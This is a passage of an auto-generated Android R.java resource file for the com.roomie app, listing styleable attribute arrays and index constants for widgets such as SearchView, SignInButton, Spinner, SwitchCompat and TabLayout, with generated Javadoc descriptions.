"<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". <p>This is a private symbol. @attr name com.roomie:searchIcon */ public static final int SearchView_searchIcon = 10; /** <p> @attr description Background for the section containing the action (e.g. voice search) <p>Must be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". <p>This is a private symbol. @attr name com.roomie:submitBackground */ public static final int SearchView_submitBackground = 16; /** <p> @attr description Layout for query suggestion rows <p>Must be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". <p>This is a private symbol. @attr name com.roomie:suggestionRowLayout */ public static final int SearchView_suggestionRowLayout = 14; /** <p> @attr description Voice button icon <p>Must be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". <p>This is a private symbol. @attr name com.roomie:voiceIcon */ public static final int SearchView_voiceIcon = 12; /** Attributes that can be used with a SignInButton. <p>Includes the following attributes:</p> <table> <colgroup align="left" /> <colgroup align="left" /> <tr><th>Attribute</th><th>Description</th></tr> <tr><td><code>{@link #SignInButton_buttonSize com.roomie:buttonSize}</code></td><td></td></tr> <tr><td><code>{@link #SignInButton_colorScheme com.roomie:colorScheme}</code></td><td></td></tr> <tr><td><code>{@link #SignInButton_scopeUris com.roomie:scopeUris}</code></td><td></td></tr> </table> @see #SignInButton_buttonSize @see #SignInButton_colorScheme @see #SignInButton_scopeUris */ public static final int[] SignInButton = { 0x7f010003, 0x7f010004, 0x7f010005 }; /** <p>This symbol is the offset where the {@link com.roomie.R.attr#buttonSize} attribute's value can be found in the {@link #SignInButton} array. <p>May be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". <p>May be one of the following constant values.</p> <table> <colgroup align="left" /> <colgroup align="left" /> <colgroup align="left" /> <tr><th>Constant</th><th>Value</th><th>Description</th></tr> <tr><td><code>standard</code></td><td>0</td><td></td></tr> <tr><td><code>wide</code></td><td>1</td><td></td></tr> <tr><td><code>icon_only</code></td><td>2</td><td></td></tr> </table> @attr name com.roomie:buttonSize */ public static final int SignInButton_buttonSize = 0; /** <p>This symbol is the offset where the {@link com.roomie.R.attr#colorScheme} attribute's value can be found in the {@link #SignInButton} array. <p>May be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". <p>May be one of the following constant values.</p> <table> <colgroup align="left" /> <colgroup align="left" /> <colgroup align="left" /> <tr><th>Constant</th><th>Value</th><th>Description</th></tr> <tr><td><code>dark</code></td><td>0</td><td></td></tr> <tr><td><code>light</code></td><td>1</td><td></td></tr> <tr><td><code>auto</code></td><td>2</td><td></td></tr> </table> @attr name com.roomie:colorScheme */ public static final int SignInButton_colorScheme = 1; /** <p>This symbol is the offset where the {@link com.roomie.R.attr#scopeUris} attribute's value can be found in the {@link #SignInButton} array. <p>May be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". <p>May be a string value, using '\\;' to escape characters such as '\\n' or '\\uxxxx' for a unicode character. @attr name com.roomie:scopeUris */ public static final int SignInButton_scopeUris = 2; /** Attributes that can be used with a Snackbar. <p>Includes the following attributes:</p> <table> <colgroup align="left" /> <colgroup align="left" /> <tr><th>Attribute</th><th>Description</th></tr> <tr><td><code>{@link #Snackbar_snackbarButtonStyle com.roomie:snackbarButtonStyle}</code></td><td></td></tr> <tr><td><code>{@link #Snackbar_snackbarStyle com.roomie:snackbarStyle}</code></td><td></td></tr> </table> @see #Snackbar_snackbarButtonStyle @see #Snackbar_snackbarStyle */ public static final int[] Snackbar = { 0x7f0101a4, 0x7f0101a5 }; /** <p>This symbol is the offset where the {@link com.roomie.R.attr#snackbarButtonStyle} attribute's value can be found in the {@link #Snackbar} array. <p>Must be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". @attr name com.roomie:snackbarButtonStyle */ public static final int Snackbar_snackbarButtonStyle = 1; /** <p>This symbol is the offset where the {@link com.roomie.R.attr#snackbarStyle} attribute's value can be found in the {@link #Snackbar} array. <p>Must be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". @attr name com.roomie:snackbarStyle */ public static final int Snackbar_snackbarStyle = 0; /** Attributes that can be used with a SnackbarLayout. <p>Includes the following attributes:</p> <table> <colgroup align="left" /> <colgroup align="left" /> <tr><th>Attribute</th><th>Description</th></tr> <tr><td><code>{@link #SnackbarLayout_android_maxWidth android:maxWidth}</code></td><td></td></tr> <tr><td><code>{@link #SnackbarLayout_elevation com.roomie:elevation}</code></td><td> Elevation for the action bar itself </td></tr> <tr><td><code>{@link #SnackbarLayout_maxActionInlineWidth com.roomie:maxActionInlineWidth}</code></td><td></td></tr> </table> @see #SnackbarLayout_android_maxWidth @see #SnackbarLayout_elevation @see #SnackbarLayout_maxActionInlineWidth */ public static final int[] SnackbarLayout = { 0x0101011f, 0x7f010045, 0x7f0101a6 }; /** <p>This symbol is the offset where the {@link android.R.attr#maxWidth} attribute's value can be found in the {@link #SnackbarLayout} array. @attr name android:maxWidth */ public static final int SnackbarLayout_android_maxWidth = 0; /** <p> @attr description Elevation for the action bar itself <p>Must be a dimension value, which is a floating point number appended with a unit such as "<code>14.5sp</code>". Available units are: px (pixels), dp (density-independent pixels), sp (scaled pixels based on preferred font size), in (inches), mm (millimeters). <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. <p>This is a private symbol. @attr name com.roomie:elevation */ public static final int SnackbarLayout_elevation = 1; /** <p>This symbol is the offset where the {@link com.roomie.R.attr#maxActionInlineWidth} attribute's value can be found in the {@link #SnackbarLayout} array. <p>Must be a dimension value, which is a floating point number appended with a unit such as "<code>14.5sp</code>". Available units are: px (pixels), dp (density-independent pixels), sp (scaled pixels based on preferred font size), in (inches), mm (millimeters). <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. @attr name com.roomie:maxActionInlineWidth */ public static final int SnackbarLayout_maxActionInlineWidth = 2; /** Attributes that can be used with a Spinner. <p>Includes the following attributes:</p> <table> <colgroup align="left" /> <colgroup align="left" /> <tr><th>Attribute</th><th>Description</th></tr> <tr><td><code>{@link #Spinner_android_dropDownWidth android:dropDownWidth}</code></td><td> Width of the dropdown in spinnerMode="dropdown".</td></tr> <tr><td><code>{@link #Spinner_android_entries android:entries}</code></td><td> Reference to an array resource that will populate the Spinner.</td></tr> <tr><td><code>{@link #Spinner_android_popupBackground android:popupBackground}</code></td><td> Background drawable to use for the dropdown in spinnerMode="dropdown".</td></tr> <tr><td><code>{@link #Spinner_android_prompt android:prompt}</code></td><td> The prompt to display when the spinner's dialog is shown.</td></tr> <tr><td><code>{@link #Spinner_popupTheme com.roomie:popupTheme}</code></td><td> Theme to use for the drop-down or dialog popup window.</td></tr> </table> @see #Spinner_android_dropDownWidth @see #Spinner_android_entries @see #Spinner_android_popupBackground @see #Spinner_android_prompt @see #Spinner_popupTheme */ public static final int[] Spinner = { 0x010100b2, 0x01010176, 0x0101017b, 0x01010262, 0x7f010046 }; /** <p> @attr description Width of the dropdown in spinnerMode="dropdown". <p>This corresponds to the global attribute resource symbol {@link android.R.attr#dropDownWidth}. @attr name android:dropDownWidth */ public static final int Spinner_android_dropDownWidth = 3; /** <p> @attr description Reference to an array resource that will populate the Spinner. <p>This corresponds to the global attribute resource symbol {@link android.R.attr#entries}. @attr name android:entries */ public static final int Spinner_android_entries = 0; /** <p> @attr description Background drawable to use for the dropdown in spinnerMode="dropdown". <p>This corresponds to the global attribute resource symbol {@link android.R.attr#popupBackground}. @attr name android:popupBackground */ public static final int Spinner_android_popupBackground = 1; /** <p> @attr description The prompt to display when the spinner's dialog is shown. <p>This corresponds to the global attribute resource symbol {@link android.R.attr#prompt}. @attr name android:prompt */ public static final int Spinner_android_prompt = 2; /** <p> @attr description Theme to use for the drop-down or dialog popup window. <p>Must be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". <p>This is a private symbol. @attr name com.roomie:popupTheme */ public static final int Spinner_popupTheme = 4; /** Indicates if the drawable needs to be mirrored when its layout direction is RTL (right-to-left). <attr name="autoMirrored"/> <p>Includes the following attributes:</p> <table> <colgroup align="left" /> <colgroup align="left" /> <tr><th>Attribute</th><th>Description</th></tr> <tr><td><code>{@link #StateListDrawable_android_constantSize android:constantSize}</code></td><td> If true, the drawable's reported internal size will remain constant as the state changes; the size is the maximum of all of the states.</td></tr> <tr><td><code>{@link #StateListDrawable_android_dither android:dither}</code></td><td> Enables or disables dithering of the bitmap if the bitmap does not have the same pixel configuration as the screen (for instance: a ARGB 8888 bitmap with an RGB 565 screen).</td></tr> <tr><td><code>{@link #StateListDrawable_android_enterFadeDuration android:enterFadeDuration}</code></td><td> Amount of time (in milliseconds) to fade in a new state drawable.</td></tr> <tr><td><code>{@link #StateListDrawable_android_exitFadeDuration android:exitFadeDuration}</code></td><td> Amount of time (in milliseconds) to fade out an old state drawable.</td></tr> <tr><td><code>{@link #StateListDrawable_android_variablePadding android:variablePadding}</code></td><td> If true, allows the drawable's padding to change based on the current state that is selected.</td></tr> <tr><td><code>{@link #StateListDrawable_android_visible android:visible}</code></td><td> Indicates whether the drawable should be initially visible.</td></tr> </table> @see #StateListDrawable_android_constantSize @see #StateListDrawable_android_dither @see #StateListDrawable_android_enterFadeDuration @see #StateListDrawable_android_exitFadeDuration @see #StateListDrawable_android_variablePadding @see #StateListDrawable_android_visible */ public static final int[] StateListDrawable = { 0x0101011c, 0x01010194, 0x01010195, 0x01010196, 0x0101030c, 0x0101030d }; /** <p> @attr description If true, the drawable's reported internal size will remain constant as the state changes; the size is the maximum of all of the states. If false, the size will vary based on the current state. <p>This corresponds to the global attribute resource symbol {@link android.R.attr#constantSize}. @attr name android:constantSize */ public static final int StateListDrawable_android_constantSize = 3; /** <p> @attr description Enables or disables dithering of the bitmap if the bitmap does not have the same pixel configuration as the screen (for instance: a ARGB 8888 bitmap with an RGB 565 screen). <p>This corresponds to the global attribute resource symbol {@link android.R.attr#dither}. @attr name android:dither */ public static final int StateListDrawable_android_dither = 0; /** <p> @attr description Amount of time (in milliseconds) to fade in a new state drawable. <p>This corresponds to the global attribute resource symbol {@link android.R.attr#enterFadeDuration}. @attr name android:enterFadeDuration */ public static final int StateListDrawable_android_enterFadeDuration = 4; /** <p> @attr description Amount of time (in milliseconds) to fade out an old state drawable. <p>This corresponds to the global attribute resource symbol {@link android.R.attr#exitFadeDuration}. @attr name android:exitFadeDuration */ public static final int StateListDrawable_android_exitFadeDuration = 5; /** <p> @attr description If true, allows the drawable's padding to change based on the current state that is selected. If false, the padding will stay the same (based on the maximum padding of all the states). Enabling this feature requires that the owner of the drawable deal with performing layout when the state changes, which is often not supported. <p>This corresponds to the global attribute resource symbol {@link android.R.attr#variablePadding}. @attr name android:variablePadding */ public static final int StateListDrawable_android_variablePadding = 2; /** <p> @attr description Indicates whether the drawable should be initially visible. <p>This corresponds to the global attribute resource symbol {@link android.R.attr#visible}. @attr name android:visible */ public static final int StateListDrawable_android_visible = 1; /** Attributes that can be used with a StateListDrawableItem. <p>Includes the following attributes:</p> <table> <colgroup align="left" /> <colgroup align="left" /> <tr><th>Attribute</th><th>Description</th></tr> <tr><td><code>{@link #StateListDrawableItem_android_drawable android:drawable}</code></td><td> Reference to a drawable resource to use for the state.</td></tr> </table> @see #StateListDrawableItem_android_drawable */ public static final int[] StateListDrawableItem = { 0x01010199 }; /** <p> @attr description Reference to a drawable resource to use for the state. If not given, the drawable must be defined by the first child tag. <p>This corresponds to the global attribute resource symbol {@link android.R.attr#drawable}. @attr name android:drawable */ public static final int StateListDrawableItem_android_drawable = 0; /** Attributes that can be used with a SwitchCompat. <p>Includes the following attributes:</p> <table> <colgroup align="left" /> <colgroup align="left" /> <tr><th>Attribute</th><th>Description</th></tr> <tr><td><code>{@link #SwitchCompat_android_textOff android:textOff}</code></td><td> Text to use when the switch is in the unchecked/"off" state.</td></tr> <tr><td><code>{@link #SwitchCompat_android_textOn android:textOn}</code></td><td> Text to use when the switch is in the checked/"on" state.</td></tr> <tr><td><code>{@link #SwitchCompat_android_thumb android:thumb}</code></td><td> Drawable to use as the "thumb" that switches back and forth.</td></tr> <tr><td><code>{@link #SwitchCompat_showText com.roomie:showText}</code></td><td> Whether to draw on/off text.</td></tr> <tr><td><code>{@link #SwitchCompat_splitTrack com.roomie:splitTrack}</code></td><td> Whether to split the track and leave a gap for the thumb drawable.</td></tr> <tr><td><code>{@link #SwitchCompat_switchMinWidth com.roomie:switchMinWidth}</code></td><td> Minimum width for the switch component </td></tr> <tr><td><code>{@link #SwitchCompat_switchPadding com.roomie:switchPadding}</code></td><td> Minimum space between the switch and caption text </td></tr> <tr><td><code>{@link #SwitchCompat_switchTextAppearance com.roomie:switchTextAppearance}</code></td><td> TextAppearance style for text displayed on the switch thumb.</td></tr> <tr><td><code>{@link #SwitchCompat_thumbTextPadding com.roomie:thumbTextPadding}</code></td><td> Amount of padding on either side of text within the switch thumb.</td></tr> <tr><td><code>{@link #SwitchCompat_thumbTint com.roomie:thumbTint}</code></td><td> Tint to apply to the thumb drawable.</td></tr> <tr><td><code>{@link #SwitchCompat_thumbTintMode com.roomie:thumbTintMode}</code></td><td> Blending mode used to apply the thumb tint.</td></tr> <tr><td><code>{@link #SwitchCompat_track com.roomie:track}</code></td><td> Drawable to use as the "track" that the switch thumb slides within.</td></tr> <tr><td><code>{@link #SwitchCompat_trackTint com.roomie:trackTint}</code></td><td> Tint to apply to the track.</td></tr> <tr><td><code>{@link #SwitchCompat_trackTintMode com.roomie:trackTintMode}</code></td><td> Blending mode used to apply the track tint.</td></tr> </table> @see #SwitchCompat_android_textOff @see #SwitchCompat_android_textOn @see #SwitchCompat_android_thumb @see #SwitchCompat_showText @see #SwitchCompat_splitTrack @see #SwitchCompat_switchMinWidth @see #SwitchCompat_switchPadding @see #SwitchCompat_switchTextAppearance @see #SwitchCompat_thumbTextPadding @see #SwitchCompat_thumbTint @see #SwitchCompat_thumbTintMode @see #SwitchCompat_track @see #SwitchCompat_trackTint @see #SwitchCompat_trackTintMode */ public static final int[] SwitchCompat = { 0x01010124, 0x01010125, 0x01010142, 0x7f010103, 0x7f010104, 0x7f010105, 0x7f010106, 0x7f010107, 0x7f010108, 0x7f010109, 0x7f01010a, 0x7f01010b, 0x7f01010c, 0x7f01010d }; /** <p> @attr description Text to use when the switch is in the unchecked/"off" state. <p>This corresponds to the global attribute resource symbol {@link android.R.attr#textOff}. @attr name android:textOff */ public static final int SwitchCompat_android_textOff = 1; /** <p> @attr description Text to use when the switch is in the checked/"on" state. <p>This corresponds to the global attribute resource symbol {@link android.R.attr#textOn}. @attr name android:textOn */ public static final int SwitchCompat_android_textOn = 0; /** <p> @attr description Drawable to use as the "thumb" that switches back and forth. <p>This corresponds to the global attribute resource symbol {@link android.R.attr#thumb}. @attr name android:thumb */ public static final int SwitchCompat_android_thumb = 2; /** <p> @attr description Whether to draw on/off text. <p>Must be a boolean value, either "<code>true</code>" or "<code>false</code>". <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. <p>This is a private symbol. @attr name com.roomie:showText */ public static final int SwitchCompat_showText = 13; /** <p> @attr description Whether to split the track and leave a gap for the thumb drawable. <p>Must be a boolean value, either "<code>true</code>" or "<code>false</code>". <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. <p>This is a private symbol. @attr name com.roomie:splitTrack */ public static final int SwitchCompat_splitTrack = 12; /** <p> @attr description Minimum width for the switch component <p>Must be a dimension value, which is a floating point number appended with a unit such as "<code>14.5sp</code>". Available units are: px (pixels), dp (density-independent pixels), sp (scaled pixels based on preferred font size), in (inches), mm (millimeters). <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. <p>This is a private symbol. @attr name com.roomie:switchMinWidth */ public static final int SwitchCompat_switchMinWidth = 10; /** <p> @attr description Minimum space between the switch and caption text <p>Must be a dimension value, which is a floating point number appended with a unit such as "<code>14.5sp</code>". Available units are: px (pixels), dp (density-independent pixels), sp (scaled pixels based on preferred font size), in (inches), mm (millimeters). <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. <p>This is a private symbol. @attr name com.roomie:switchPadding */ public static final int SwitchCompat_switchPadding = 11; /** <p> @attr description TextAppearance style for text displayed on the switch thumb. <p>Must be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". <p>This is a private symbol. @attr name com.roomie:switchTextAppearance */ public static final int SwitchCompat_switchTextAppearance = 9; /** <p> @attr description Amount of padding on either side of text within the switch thumb. <p>Must be a dimension value, which is a floating point number appended with a unit such as "<code>14.5sp</code>". Available units are: px (pixels), dp (density-independent pixels), sp (scaled pixels based on preferred font size), in (inches), mm (millimeters). <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. <p>This is a private symbol. @attr name com.roomie:thumbTextPadding */ public static final int SwitchCompat_thumbTextPadding = 8; /** <p> @attr description Tint to apply to the thumb drawable. <p>Must be a color value, in the form of "<code>#<i>rgb</i></code>", "<code>#<i>argb</i></code>", "<code>#<i>rrggbb</i></code>", or "<code>#<i>aarrggbb</i></code>". <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. <p>This is a private symbol. @attr name com.roomie:thumbTint */ public static final int SwitchCompat_thumbTint = 3; /** <p> @attr description Blending mode used to apply the thumb tint. <p>Must be one of the following constant values.</p> <table> <colgroup align="left" /> <colgroup align="left" /> <colgroup align="left" /> <tr><th>Constant</th><th>Value</th><th>Description</th></tr> <tr><td><code>src_over</code></td><td>3</td><td> The tint is drawn on top of the drawable. [Sa + (1 - Sa)*Da, Rc = Sc + (1 - Sa)*Dc] </td></tr> <tr><td><code>src_in</code></td><td>5</td><td> The tint is masked by the alpha channel of the drawable. The drawable’s color channels are thrown out. [Sa * Da, Sc * Da] </td></tr> <tr><td><code>src_atop</code></td><td>9</td><td> The tint is drawn above the drawable, but with the drawable’s alpha channel masking the result. [Da, Sc * Da + (1 - Sa) * Dc] </td></tr> <tr><td><code>multiply</code></td><td>14</td><td> Multiplies the color and alpha channels of the drawable with those of the tint. [Sa * Da, Sc * Dc] </td></tr> <tr><td><code>screen</code></td><td>15</td><td> [Sa + Da - Sa * Da, Sc + Dc - Sc * Dc] </td></tr> <tr><td><code>add</code></td><td>16</td><td> Combines the tint and drawable color and alpha channels, clamping the result to valid color values. Saturate(S + D) </td></tr> </table> <p>This is a private symbol. @attr name com.roomie:thumbTintMode */ public static final int SwitchCompat_thumbTintMode = 4; /** <p> @attr description Drawable to use as the "track" that the switch thumb slides within. <p>Must be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". <p>This is a private symbol. @attr name com.roomie:track */ public static final int SwitchCompat_track = 5; /** <p> @attr description Tint to apply to the track. <p>Must be a color value, in the form of "<code>#<i>rgb</i></code>", "<code>#<i>argb</i></code>", "<code>#<i>rrggbb</i></code>", or "<code>#<i>aarrggbb</i></code>". <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. <p>This is a private symbol. @attr name com.roomie:trackTint */ public static final int SwitchCompat_trackTint = 6; /** <p> @attr description Blending mode used to apply the track tint. <p>Must be one of the following constant values.</p> <table> <colgroup align="left" /> <colgroup align="left" /> <colgroup align="left" /> <tr><th>Constant</th><th>Value</th><th>Description</th></tr> <tr><td><code>src_over</code></td><td>3</td><td> The tint is drawn on top of the drawable. [Sa + (1 - Sa)*Da, Rc = Sc + (1 - Sa)*Dc] </td></tr> <tr><td><code>src_in</code></td><td>5</td><td> The tint is masked by the alpha channel of the drawable. The drawable’s color channels are thrown out. [Sa * Da, Sc * Da] </td></tr> <tr><td><code>src_atop</code></td><td>9</td><td> The tint is drawn above the drawable, but with the drawable’s alpha channel masking the result. [Da, Sc * Da + (1 - Sa) * Dc] </td></tr> <tr><td><code>multiply</code></td><td>14</td><td> Multiplies the color and alpha channels of the drawable with those of the tint. [Sa * Da, Sc * Dc] </td></tr> <tr><td><code>screen</code></td><td>15</td><td> [Sa + Da - Sa * Da, Sc + Dc - Sc * Dc] </td></tr> <tr><td><code>add</code></td><td>16</td><td> Combines the tint and drawable color and alpha channels, clamping the result to valid color values. Saturate(S + D) </td></tr> </table> <p>This is a private symbol. @attr name com.roomie:trackTintMode */ public static final int SwitchCompat_trackTintMode = 7; /** Attributes that can be used with a TabItem. <p>Includes the following attributes:</p> <table> <colgroup align="left" /> <colgroup align="left" /> <tr><th>Attribute</th><th>Description</th></tr> <tr><td><code>{@link #TabItem_android_icon android:icon}</code></td><td></td></tr> <tr><td><code>{@link #TabItem_android_layout android:layout}</code></td><td></td></tr> <tr><td><code>{@link #TabItem_android_text android:text}</code></td><td></td></tr> </table> @see #TabItem_android_icon @see #TabItem_android_layout @see #TabItem_android_text */ public static final int[] TabItem = { 0x01010002, 0x010100f2, 0x0101014f }; /** <p>This symbol is the offset where the {@link android.R.attr#icon} attribute's value can be found in the {@link #TabItem} array. @attr name android:icon */ public static final int TabItem_android_icon = 0; /** <p>This symbol is the offset where the {@link android.R.attr#layout} attribute's value can be found in the {@link #TabItem} array. @attr name android:layout */ public static final int TabItem_android_layout = 1; /** <p>This symbol is the offset where the {@link android.R.attr#text} attribute's value can be found in the {@link #TabItem} array. @attr name android:text */ public static final int TabItem_android_text = 2; /** Attributes that can be used with a TabLayout. <p>Includes the following attributes:</p> <table> <colgroup align="left" /> <colgroup align="left" /> <tr><th>Attribute</th><th>Description</th></tr> <tr><td><code>{@link #TabLayout_tabBackground com.roomie:tabBackground}</code></td><td></td></tr> <tr><td><code>{@link #TabLayout_tabContentStart com.roomie:tabContentStart}</code></td><td></td></tr> <tr><td><code>{@link #TabLayout_tabGravity com.roomie:tabGravity}</code></td><td></td></tr> <tr><td><code>{@link #TabLayout_tabIconTint com.roomie:tabIconTint}</code></td><td></td></tr> <tr><td><code>{@link #TabLayout_tabIconTintMode com.roomie:tabIconTintMode}</code></td><td></td></tr> <tr><td><code>{@link #TabLayout_tabIndicator com.roomie:tabIndicator}</code></td><td></td></tr> <tr><td><code>{@link #TabLayout_tabIndicatorAnimationDuration com.roomie:tabIndicatorAnimationDuration}</code></td><td></td></tr> <tr><td><code>{@link #TabLayout_tabIndicatorColor com.roomie:tabIndicatorColor}</code></td><td></td></tr> <tr><td><code>{@link #TabLayout_tabIndicatorFullWidth com.roomie:tabIndicatorFullWidth}</code></td><td></td></tr> <tr><td><code>{@link #TabLayout_tabIndicatorGravity com.roomie:tabIndicatorGravity}</code></td><td></td></tr> <tr><td><code>{@link #TabLayout_tabIndicatorHeight com.roomie:tabIndicatorHeight}</code></td><td></td></tr> <tr><td><code>{@link #TabLayout_tabInlineLabel com.roomie:tabInlineLabel}</code></td><td></td></tr> <tr><td><code>{@link #TabLayout_tabMaxWidth com.roomie:tabMaxWidth}</code></td><td></td></tr> <tr><td><code>{@link #TabLayout_tabMinWidth com.roomie:tabMinWidth}</code></td><td></td></tr> <tr><td><code>{@link #TabLayout_tabMode com.roomie:tabMode}</code></td><td></td></tr> <tr><td><code>{@link #TabLayout_tabPadding com.roomie:tabPadding}</code></td><td></td></tr> <tr><td><code>{@link #TabLayout_tabPaddingBottom com.roomie:tabPaddingBottom}</code></td><td></td></tr> <tr><td><code>{@link #TabLayout_tabPaddingEnd com.roomie:tabPaddingEnd}</code></td><td></td></tr> <tr><td><code>{@link #TabLayout_tabPaddingStart com.roomie:tabPaddingStart}</code></td><td></td></tr> <tr><td><code>{@link #TabLayout_tabPaddingTop com.roomie:tabPaddingTop}</code></td><td></td></tr> <tr><td><code>{@link #TabLayout_tabRippleColor com.roomie:tabRippleColor}</code></td><td></td></tr> <tr><td><code>{@link #TabLayout_tabSelectedTextColor com.roomie:tabSelectedTextColor}</code></td><td></td></tr> <tr><td><code>{@link #TabLayout_tabTextAppearance com.roomie:tabTextAppearance}</code></td><td></td></tr> <tr><td><code>{@link #TabLayout_tabTextColor com.roomie:tabTextColor}</code></td><td></td></tr> <tr><td><code>{@link #TabLayout_tabUnboundedRipple com.roomie:tabUnboundedRipple}</code></td><td></td></tr> </table> @see #TabLayout_tabBackground @see #TabLayout_tabContentStart @see #TabLayout_tabGravity @see #TabLayout_tabIconTint @see #TabLayout_tabIconTintMode @see #TabLayout_tabIndicator @see #TabLayout_tabIndicatorAnimationDuration @see #TabLayout_tabIndicatorColor @see #TabLayout_tabIndicatorFullWidth @see #TabLayout_tabIndicatorGravity @see #TabLayout_tabIndicatorHeight @see #TabLayout_tabInlineLabel @see #TabLayout_tabMaxWidth @see #TabLayout_tabMinWidth @see #TabLayout_tabMode @see #TabLayout_tabPadding @see #TabLayout_tabPaddingBottom @see #TabLayout_tabPaddingEnd @see #TabLayout_tabPaddingStart @see #TabLayout_tabPaddingTop @see #TabLayout_tabRippleColor @see #TabLayout_tabSelectedTextColor @see #TabLayout_tabTextAppearance @see #TabLayout_tabTextColor @see #TabLayout_tabUnboundedRipple */ public static final int[] TabLayout = { 0x7f0101a7, 0x7f0101a8, 0x7f0101a9, 0x7f0101aa, 0x7f0101ab, 0x7f0101ac, 0x7f0101ad, 0x7f0101ae, 0x7f0101af, 0x7f0101b0, 0x7f0101b1, 0x7f0101b2, 0x7f0101b3, 0x7f0101b4, 0x7f0101b5, 0x7f0101b6, 0x7f0101b7, 0x7f0101b8, 0x7f0101b9, 0x7f0101ba, 0x7f0101bb, 0x7f0101bc, 0x7f0101bd, 0x7f0101be, 0x7f0101bf }; /** <p>This symbol is the offset where the {@link com.roomie.R.attr#tabBackground} attribute's value can be found in the {@link #TabLayout} array. <p>Must be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". @attr name com.roomie:tabBackground */ public static final int TabLayout_tabBackground = 3; /** <p>This symbol is the offset where the {@link com.roomie.R.attr#tabContentStart} attribute's value can be found in the {@link #TabLayout} array. <p>Must be a dimension value, which is a floating point number appended with a unit such as "<code>14.5sp</code>". Available units are: px (pixels), dp (density-independent pixels), sp (scaled pixels based on preferred font size), in (inches), mm (millimeters). <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. @attr name com.roomie:tabContentStart */ public static final int TabLayout_tabContentStart = 2; /** <p>This symbol is the offset where the {@link com.roomie.R.attr#tabGravity} attribute's value can be found in the {@link #TabLayout} array. <p>Must be one of the following constant values.</p> <table> <colgroup align="left" /> <colgroup align="left" /> <colgroup align="left" /> <tr><th>Constant</th><th>Value</th><th>Description</th></tr> <tr><td><code>fill</code></td><td>0</td><td></td></tr> <tr><td><code>center</code></td><td>1</td><td></td></tr> </table> @attr name com.roomie:tabGravity */ public static final int TabLayout_tabGravity = 9; /** <p>This symbol is the offset where the {@link com.roomie.R.attr#tabIconTint} attribute's value can be found in the {@link #TabLayout} array. <p>Must be a color value, in the form of "<code>#<i>rgb</i></code>", "<code>#<i>argb</i></code>", "<code>#<i>rrggbb</i></code>", or "<code>#<i>aarrggbb</i></code>". <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. @attr name com.roomie:tabIconTint */ public static final int TabLayout_tabIconTint = 21; /** <p>This symbol is the offset where the {@link 